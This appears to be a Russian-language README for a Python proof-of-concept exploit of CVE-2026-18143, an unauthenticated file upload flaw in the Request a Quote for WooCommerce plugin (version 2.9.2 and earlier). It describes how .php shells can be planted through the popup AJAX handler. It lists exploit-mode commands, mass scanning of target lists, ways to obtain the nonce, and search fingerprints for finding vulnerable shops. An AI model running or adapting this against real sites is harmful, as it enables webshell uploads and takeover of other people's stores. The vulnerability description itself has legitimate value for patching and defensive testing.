
Python PoC, который проверяет и эксплуатирует CVE-2026-18143 — неаутентифицированную загрузку произвольных файлов в Addify Request a Quote for WooCommerce ≤ 2.9.2 через AJAX-обработчик всплывающего окна.
Python 3 PoC для CVE-2026-18143 в Request a Quote for WooCommerce (woocommerce-request-a-quote, Addify / WooCommerce.com).
CVE-2026-18143 — Request a Quote for WooCommerce ≤ 2.9.2 позволяет неаутентифицированную произвольную загрузку файлов (CWE-434, CVSS 9.8 Critical) через afrfq_submit_quote_via_popup(). Обработчик всплывающего окна вызывает move_uploaded_file(), используя исходное имя файла, полученное от клиента, без проверки расширения или MIME-типа, записывая файл в доступную через веб временную директорию загрузки RFQ. Злоумышленники могут загружать .php-шеллы, когда публичное правило цитирования использует многостраничный поток всплывающего окна. Исправлено в > 2.9.2.
Страница PoC: https://pocbit.org/pocs/cve-2026-18143
Каталог: https://pocbit.org/pocs/
| Продукт | Request a Quote for WooCommerce (Addify) |
| Путь плагина | wp-content/plugins/woocommerce-request-a-quote/ |
| Уязвимые версии | ≤ 2.9.2 |
| AJAX | action=afrfq_submit_quote_via_popup → admin-ajax.php |
| Предварительное условие | Правило цитирования через всплывающее окно включено на витрине |
pip install -r requirements.txt
python poc.py -u https://shop.example --mode check
python poc.py -u https://shop.example --mode check --upload-probe
python poc.py -u https://shop.example --mode exploit --nonce YOUR_NONCE --verify
python poc.py -u https://shop.example --mode exploit --page /shop/ --verify
python poc.py --list targets.example.txt --mode check -j 15
Nonce обычно находится во фронтенд-JS (локализованный объект afrfq) на страницах магазина/товара, когда активно всплывающее окно цитирования.
body="/wp-content/plugins/woocommerce-request-a-quote/"
body="afrfq"
Только авторизованное тестирование. --upload-probe / --mode exploit записывают файлы на целевой сервер.